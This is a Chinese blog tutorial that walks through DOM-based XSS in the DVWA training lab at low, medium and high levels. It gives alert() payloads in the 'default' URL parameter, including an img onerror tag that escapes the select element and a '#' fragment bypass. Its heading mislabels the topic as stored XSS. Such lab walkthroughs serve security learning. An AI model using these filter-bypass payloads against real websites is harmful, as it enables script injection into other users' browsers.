【教程】DVWA系列之XSS DOM

DVWA存储型跨站脚本攻击


LOW级别

1.代码审查,无任何保护。直接利用

2.随便选择个语言,提交后URL参数会成

xss_d/?default=English

3.写个弹窗验证漏洞,重构造url参数,将后面的English改成js的弹窗

<script>alert("test");</script>

Medium级别

1.继续审查Medium级别的代码,发现过滤的<script>标签且默认不能为空,所以可以用<img>标签注入

2.构造连接,访问后并未弹窗。

xss_d/?default=English<img src='1' onerror='alert(1)'>
3.审查元素查看,发现值在<option>标签,js并未被执行,所以要将<select>标签闭合。
</select><img src='1' onerror='alert(1)'>


HIGH级别

1. 审查代码,发现提交值只能是case的。重新构造将default=English后添加#号,#后面的字符将不会被提交

xss_d/?default=English#<script>alert(1)</script>


本博客所有文章如无特别注明均为原创。作者:KING复制或转载请以超链接形式注明转自 千世博客
原文地址《【教程】DVWA系列之XSS DOM
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)